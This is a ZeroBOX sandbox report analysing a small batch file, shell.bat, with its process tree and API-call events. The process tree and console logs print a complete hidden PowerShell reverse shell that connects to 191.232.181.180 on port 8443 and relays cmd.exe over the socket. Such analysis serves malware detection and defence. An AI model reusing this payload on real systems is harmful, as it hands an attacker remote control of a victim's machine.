Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 17, 2024, 8:47 p.m.	July 17, 2024, 8:49 p.m.

Size	1.6KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`4baea5b66334a3be30d12b1956fe889e`
SHA256	`0cbc9aef6dd83f1b09549c89dcd27f29cfb05f8af06bea0e7192197a17a765de`
CRC32	`8FC34CE4`
ssdeep	`48:Wv37GW2WLnSB7IxcSe5LXFQz+39XvwS0CfakvZpOWi:TEUIxcSOyKYS9C`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "dwgenGeAk" C:\Users\test22\AppData\Local\Temp\shell.bat
2588
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\shell.bat
  2660
  - powershell.exe powershell -w hidden -nop -c $a='191.232.181.180';$b=8443;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream();while ($true) { start-sleep -m 100; if ($osread.IsCompleted -and $osread.Result -ne 0) { $r=$os.BaseStream.EndRead($osread); $s.Write($ob,0,$r); $s.Flush(); $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null); } if ($esread.IsCompleted -and $esread.Result -ne 0) { $r=$es.BaseStream.EndRead($esread); $s.Write($eb,0,$r); $s.Flush(); $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null); } if ($s.DataAvailable) { $r=$s.Read($nb,0,$nb.Length); if ($r -lt 1) { break; } else { $str=$e.GetString($nb,0,$r); $is.write($str); } } if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) { break; } if ($p.ExitCode -ne $null) { break; }}
    2748
    - cmd.exe "cmd.exe"
      2864

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
191.232.181.180	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 17, 2024, 8:47 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 17, 2024, 8:47 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 17, 2024, 8:47 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 17, 2024, 8:47 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 17, 2024, 8:47 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 17, 2024, 8:47 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 17, 2024, 8:47 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 17, 2024, 8:47 p.m.			0	0

Command line console output was observed (50 out of 100 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: powershell console_handle: 0x00000007	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: -w hidden -nop -c $a='191.232.181.180';$b=8443;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream();while ($true) { start-sleep -m 100; if ($osread.IsCompleted -and $osread.Result -ne 0) { $r=$os.BaseStream.EndRead($osread); $s.Write($ob,0,$r); $s.Flush(); $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null); } if ($esread.IsCompleted -and $esread.Result -ne 0) { $r=$es.BaseStream.EndRead($esread); $s.Write($eb,0,$r); $s.Flush(); $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null); } if ($s.DataAvailable) { $r=$s.Read($nb,0,$nb.Length); if ($r -lt 1) { break; } else { $str=$e.GetString($nb,0,$r); $is.write($str); } } if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) { break; } if ($p.ExitCode -ne $null) { break; }} console_handle: 0x00000007	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: Exception calling "Connect" with "2" argument(s): "No connection could be made console_handle: 0x00000023	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: because the target machine actively refused it 191.232.181.180:8443" console_handle: 0x0000002f	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: At line:1 char:670 console_handle: 0x0000003b	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: + $a='191.232.181.180';$b=8443;$c=New-Object system.net.sockets.tcpclient;$nb=N console_handle: 0x00000047	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: ew-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536 console_handle: 0x00000053	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: ;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=N console_handle: 0x0000005f	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: ew-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartIn console_handle: 0x0000006b	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: fo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.R console_handle: 0x00000077	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: edirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.Stan console_handle: 0x00000083	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: dardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.Beg console_handle: 0x0000008f	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: inRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, console_handle: 0x0000009b	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: 0, $eb.Length, $null, $null);$c.connect <<<< ($a,$b);$s=$c.GetStream();while ($ console_handle: 0x000000a7	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: true) { start-sleep -m 100; if ($osread.IsCompleted -and $osread.Result -ne 0) console_handle: 0x000000b3	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: { $r=$os.BaseStream.EndRead($osread); $s.Write($ob,0,$r); $s.Flush(); $osread=$ console_handle: 0x000000bf	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null); } if ($esread.IsComp console_handle: 0x000000cb	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: leted -and $esread.Result -ne 0) { $r=$es.BaseStream.EndRead($esread); $s.Write console_handle: 0x000000d7	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: ($eb,0,$r); $s.Flush(); $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $n console_handle: 0x000000e3	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: ull, $null); } if ($s.DataAvailable) { $r=$s.Read($nb,0,$nb.Length); if ($r -lt console_handle: 0x000000ef	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: 1) { break; } else { $str=$e.GetString($nb,0,$r); $is.write($str); } } if ($c. console_handle: 0x000000fb	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::Sele console_handle: 0x00000107	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: ctRead) -and $c.Client.Available -eq 0)) { break; } if ($p.ExitCode -ne $null) console_handle: 0x00000113	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: { break; }} console_handle: 0x0000011f	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000012b	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000137	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: Exception calling "GetStream" with "0" argument(s): "The operation is not allow console_handle: 0x00000157	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: ed on non-connected sockets." console_handle: 0x00000163	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: At line:1 char:693 console_handle: 0x0000016f	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: + $a='191.232.181.180';$b=8443;$c=New-Object system.net.sockets.tcpclient;$nb=N console_handle: 0x0000017b	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: ew-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536 console_handle: 0x00000187	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: ;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=N console_handle: 0x00000193	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: ew-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartIn console_handle: 0x0000019f	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: fo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.R console_handle: 0x000001ab	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: edirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.Stan console_handle: 0x000001b7	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: dardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.Beg console_handle: 0x000001c3	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: inRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, console_handle: 0x000001cf	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: 0, $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream <<<< ();while ($ console_handle: 0x000001db	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: true) { start-sleep -m 100; if ($osread.IsCompleted -and $osread.Result -ne 0) console_handle: 0x000001e7	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: { $r=$os.BaseStream.EndRead($osread); $s.Write($ob,0,$r); $s.Flush(); $osread=$ console_handle: 0x000001f3	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null); } if ($esread.IsComp console_handle: 0x000001ff	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: leted -and $esread.Result -ne 0) { $r=$es.BaseStream.EndRead($esread); $s.Write console_handle: 0x0000020b	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: ($eb,0,$r); $s.Flush(); $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $n console_handle: 0x00000217	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: ull, $null); } if ($s.DataAvailable) { $r=$s.Read($nb,0,$nb.Length); if ($r -lt console_handle: 0x00000223	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: 1) { break; } else { $str=$e.GetString($nb,0,$r); $is.write($str); } } if ($c. console_handle: 0x0000022f	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::Sele console_handle: 0x0000023b	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: ctRead) -and $c.Client.Available -eq 0)) { break; } if ($p.ExitCode -ne $null) console_handle: 0x00000247	1	1
WriteConsoleW July 17, 2024, 8:47 p.m.	buffer: { break; }} console_handle: 0x00000253	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a438 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038ad38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038ad38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038ad38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038ad38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038ad38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038ad38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a8b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a8b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a8b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a4f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a0b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a0b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a0b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a0b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a0b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a0b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a0b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a0b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a0b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a0b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a0b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a0b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a0b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a0b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038acf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038acf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 17, 2024, 8:47 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 17, 2024, 8:47 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 158 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 393216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02670000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02690000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02691000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0279a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02792000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0279c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05080000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02793000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02794000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02795000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
